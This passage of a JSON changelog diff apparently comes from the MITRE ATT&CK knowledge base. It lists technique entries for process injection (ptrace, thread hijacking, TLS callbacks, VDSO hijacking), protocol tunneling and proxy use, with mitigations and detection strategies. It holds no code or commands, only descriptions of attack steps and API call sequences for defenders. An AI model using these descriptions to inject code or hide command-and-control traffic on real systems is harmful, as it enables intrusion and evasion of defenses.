+                    "description": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPtrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: <code>malloc</code>) then invoking that memory with <code>PTRACE_SETREGS</code> to set the register containing the next instruction to execute. Ptrace system call injection can also be done with <code>PTRACE_POKETEXT</code>/<code>PTRACE_POKEDATA</code>, which copy data to a specific address in the target processes\u2019 memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1055/008",
+                            "external_id": "T1055.008"
+                        },
+                        {
+                            "source_name": "BH Linux Inject",
+                            "description": "Colgan, T. (2015, August 15). Linux-Inject. Retrieved February 21, 2020.",
+                            "url": "https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf"
+                        },
+                        {
+                            "source_name": "Medium Ptrace JUL 2018",
+                            "description": "Jain, S. (2018, July 25). Code injection in running process using ptrace. Retrieved February 21, 2020.",
+                            "url": "https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be"
+                        },
+                        {
+                            "source_name": "PTRACE man",
+                            "description": "Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's Manual. Retrieved February 21, 2020.",
+                            "url": "http://man7.org/linux/man-pages/man2/ptrace.2.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2026-04-15 22:30:27.359000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0203: Detection Strategy for Ptrace-Based Process Injection on Linux"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-14 01:28:32.166000+00:00",
+                    "modified": "2026-05-12 15:12:00.629000+00:00",
+                    "name": "Thread Execution Hijacking",
+                    "description": "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nThread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as <code>OpenThread</code>. At this point the process can be suspended then written to, realigned to the injected code, and resumed via <code>SuspendThread </code>, <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state.  \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1055/003",
+                            "external_id": "T1055.003"
+                        },
+                        {
+                            "source_name": "Elastic Process Injection July 2017",
+                            "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.",
+                            "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.629000+00:00\", \"old_value\": \"2026-04-15 22:30:40.463000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0295: Behavioral Detection of Thread Execution Hijacking via Thread Suspension and Context Switching"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-14 01:30:41.092000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Thread Local Storage",
+                    "description": "Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. \n\nTLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process\u2019 memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1055/005",
+                            "external_id": "T1055.005"
+                        },
+                        {
+                            "source_name": "FireEye TLS Nov 2017",
+                            "description": "Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved December 18, 2017.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2026-04-15 22:30:51.339000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0467: Detection Strategy for TLS Callback Injection via PE Memory Modification and Hollowing"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-14 01:35:00.781000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "VDSO Hijacking",
+                    "description": "Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nVDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009)(Citation: Backtrace VDSO)(Citation: VDSO Aug 2005)(Citation: Syscall 2014)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.  ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1055/014",
+                            "external_id": "T1055.014"
+                        },
+                        {
+                            "source_name": "Backtrace VDSO",
+                            "description": "backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20210205211142/https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/"
+                        },
+                        {
+                            "source_name": "Syscall 2014",
+                            "description": "Drysdale, D. (2014, July 16). Anatomy of a system call, part 2. Retrieved June 16, 2020.",
+                            "url": "https://lwn.net/Articles/604515/"
+                        },
+                        {
+                            "source_name": "ELF Injection May 2009",
+                            "description": "O'Neill, R. (2009, May). Modern Day ELF Runtime infection via GOT poisoning. Retrieved March 15, 2020.",
+                            "url": "https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html"
+                        },
+                        {
+                            "source_name": "VDSO Aug 2005",
+                            "description": "Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved June 16, 2020.",
+                            "url": "https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2026-04-15 22:30:51.756000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0448: Detection Strategy for VDSO Hijacking on Linux"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-15 16:03:39.082000+00:00",
+                    "modified": "2026-05-12 15:12:00.632000+00:00",
+                    "name": "Protocol Tunneling",
+                    "description": "Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. \n\nThere are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling)(Citation: Sygnia Abyss Locker 2025) \n\n[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1572",
+                            "external_id": "T1572"
+                        },
+                        {
+                            "source_name": "Sygnia Abyss Locker 2025",
+                            "description": "Abigail See, Zhongyuan (Aaron) Hau, Ren Jie Yow, Yoav Mazor, Omer Kidron, and Oren Biderman. (2025, February 4). The Anatomy of Abyss Locker Ransomware Attack. Retrieved April 4, 2025.",
+                            "url": "https://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        },
+                        {
+                            "source_name": "BleepingComp Godlua JUL19",
+                            "description": "Gatlan, S. (2019, July 3). New Godlua Malware Evades Traffic Monitoring via DNS over HTTPS. Retrieved March 15, 2020.",
+                            "url": "https://www.bleepingcomputer.com/news/security/new-godlua-malware-evades-traffic-monitoring-via-dns-over-https/"
+                        },
+                        {
+                            "source_name": "SSH Tunneling",
+                            "description": "SSH.COM. (n.d.). SSH tunnel. Retrieved March 15, 2020.",
+                            "url": "https://www.ssh.com/ssh/tunneling"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.632000+00:00\", \"old_value\": \"2025-10-24 17:48:45.888000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1031: Network Intrusion Prevention",
+                            "M1037: Filter Network Traffic"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0538: Detection Strategy for Protocol Tunneling accross OS platforms."
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:08.479000+00:00",
+                    "modified": "2026-05-12 15:12:00.641000+00:00",
+                    "name": "Proxy",
+                    "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1090",
+                            "external_id": "T1090"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        },
+                        {
+                            "source_name": "Trend Micro APT Attack Tools",
+                            "description": "Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015.",
+                            "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Jon Sheedy",
+                        "Heather Linn",
+                        "Walker Johnson"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.641000+00:00\", \"old_value\": \"2025-10-24 17:48:57.330000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "3.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1020: SSL/TLS Inspection",
+                            "M1031: Network Intrusion Prevention",
+                            "M1037: Filter Network Traffic"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0445: Detection of Proxy Infrastructure Setup and Traffic Bridging"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-14 23:12:18.466000+00:00",
+                    "modified": "2026-05-12 15:12:00.640000+00:00",
+                    "name": "External Proxy",
+                    "description": "Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.\n\nExternal connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1090/002",
+                            "external_id": "T1090.002"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        },
+                        {
+                            "source_name": "Trend Micro APT Attack Tools",
+                            "description": "Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015.",
+                            "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.640000+00:00\", \"old_value\": \"2025-10-24 17:48:54.165000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1031: Network Intrusion Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0325: External Proxy Behavior via Outbound Relay to Intermediate Infrastructure"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-14 23:08:20.244000+00:00",
+                    "modified": "2026-05-12 15:12:00.724000+00:00",
+                    "name": "Internal Proxy",
+                    "description": "Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.\n\nBy using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1090/001",
+                            "external_id": "T1090.001"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        },
+                        {
+                            "source_name": "Trend Micro APT Attack Tools",
+                            "description": "Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015.",
+                            "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.724000+00:00\", \"old_value\": \"2025-10-24 17:49:37.574000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1031: Network Intrusion Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0075: Internal Proxy Behavior via Lateral Host-to-Host C2 Relay"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-14 23:23:41.770000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Multi-hop Proxy",
+                    "description": "Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.\n\nFor example, adversaries may construct or use onion routing networks \u2013 such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network \u2013 to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing) Adversaries may also use operational relay box (ORB) networks composed of virtual private servers (VPS), Internet of Things (IoT) devices, smart devices, and end-of-life routers to obfuscate their operations.(Citation: ORB Mandiant) \n\nIn the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization\u2019s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.  \n\nSimilarly, adversaries may abuse 